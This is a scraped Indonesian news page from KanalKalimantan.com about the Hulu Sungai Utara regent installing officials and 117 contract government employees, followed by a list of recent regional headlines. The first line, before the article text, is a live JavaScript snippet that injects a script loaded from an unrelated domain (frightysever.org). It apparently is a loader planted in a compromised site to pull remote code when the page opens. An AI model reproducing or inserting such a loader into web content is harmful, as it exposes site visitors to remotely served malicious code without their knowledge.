(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Bupati HSU Melantik Pejabat Struktural, Fungsional dan 117 PPPK


KANALKALIMANTAN.COM, AMUNTAI – Bupati Hulu Sungai Utara (HSU) H Sahrujani melantik pejabat struktural, fungsional dan Pegawai Pemerintah dengan Perjanjian Kerja (PPPK) di lingkungan Pemkab HSU.

Pelantikan berlangsung di ula Dr KH Idham Chalid, Senin (29/9/2025) siang. Satu pejabat pimpinan tinggi pratama, 42 pejabat administrator, 10 pejabat fungsional, dan 117 Pegawai Pemerintah dengan Perjanjian Kerja (PPPK), 1 CPNS, serta 1 PNS.

Bupati HSU mengingatkan bahwa jabatan adalah amanah yang harus dijalankan dengan penuh tanggung jawab, dedikasi, serta komitmen tinggi demi memberikan pelayanan terbaik kepada masyarakat.

Baca juga: Korem 101/Antasari Alih Kodal dari Kodam VI/Mulawarman ke Kodam XXII/Tambun Bungai


“Atas nama pemerintah daerah, saya menyampaikan ucapan selamat dan sukses. Semoga kepercayaan dan amanah yang diberikan hari ini dapat ditindaklanjuti dengan karya nyata, kerja keras, dan kinerja yang tinggi untuk kepentingan masyarakat serta Banua kita tercinta,” kata Haji Jani -sapaan Sahrujani-.

Haji Jani menegaskan bahwa pelantikan dan pengambilan sumpah jabatan ini merupakan bagian dari dinamika birokrasi yang mutlak dilakukan. Penting dalam rangka mendukung percepatan pembangunan, meningkatkan pelayanan, dan mewujudkan kesejahteraan masyarakat di Kabupaten HSU.

Baca juga: Pj Sekda Banjar Launching Pelaksanaan Integrasi Layanan Primer Terintegrasi dengan Posyandu Siklus Hidup 

Ia berpesan agar pejabat yang baru dilantik mampu bekerja maksimal dengan melanjutkan program-program yang sudah berjalan baik, sekaligus membawa perubahan dan perbaikan signifikan di SKPD masing-masing.

“Berawal dari SKPD yang mampu bekerja dan berkinerja baik, maka akan memberikan dampak positif bagi pelayanan masyarakat, akselerasi pembangunan, penyelenggaraan pemerintahan, serta pembinaan masyarakat. Harapan kita bersama, Pemkab HSU akan semakin mewujudkan pemerintahan yang baik, profesional, dan akuntabel,” pungkasnya. (KanalKalimantan.com/dew)

Reporter: dew
Editor: bie


Muhammad Andi

Recent Posts

Musrenbang Kecamatan Selat Digelar, Ini Kata Wakil Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Musyawarah Perencanaan Pembangunan (Musrenbang) Tingkat Kecamatan Selat dalam rangka penyusunan Rencana… Read More

27 menit ago

Resmikan 166 Sekolah Rakyat, Prabowo Target 500 Sekolah Rakyat di 2029

KANALKALIMANTAN.COM, BANJARBARU - Presiden Republik Indonesia Prabowo Subianto didampingi sejumlah Menteri Kabinet Merah Putih dan… Read More

2 jam ago

Prabowo Janjikan Kampus Kedokteran Gratis

KANALKALIMANTAN.COM, BANJARBARU - Presiden Prabowo Subianto berkeinginan membuka banyak sekolah dan kampus. Ia memandang pendidikan… Read More

3 jam ago

Tiba di Banjarbaru, Presiden Prabowo Resmikan 166 Sekolah Rakyat

KANALKALIMANTAN.COM, BANJARBARU - Presiden Prabowo Subianto melakukan kunjungan kerja ke Kota Banjarbaru, Provinsi Kalimantan Selatan,… Read More

7 jam ago

Peluncuran Budaya Sekolah Aman dan Nyaman di Banjarbaru, Ini Kata Mendikdasmen Abdul Mu’ti

KANALKALIMANTAN.COM, BANJARBARU – Kota Banjarbaru menjadi salah satu titik penting peluncuran budaya sekolah aman dan… Read More

8 jam ago

Nilai TKA Jadi Syarat Wajib untuk Siswa Eligible SNBP 2026

KANALKALIMANTAN.COM, JAKARTA - Seleksi Nasional Berdasarkan Prestasi (SNBP) 2026 menjadi perhatian siswa kelas akhir SMA,… Read More

10 jam ago

This website uses cookies.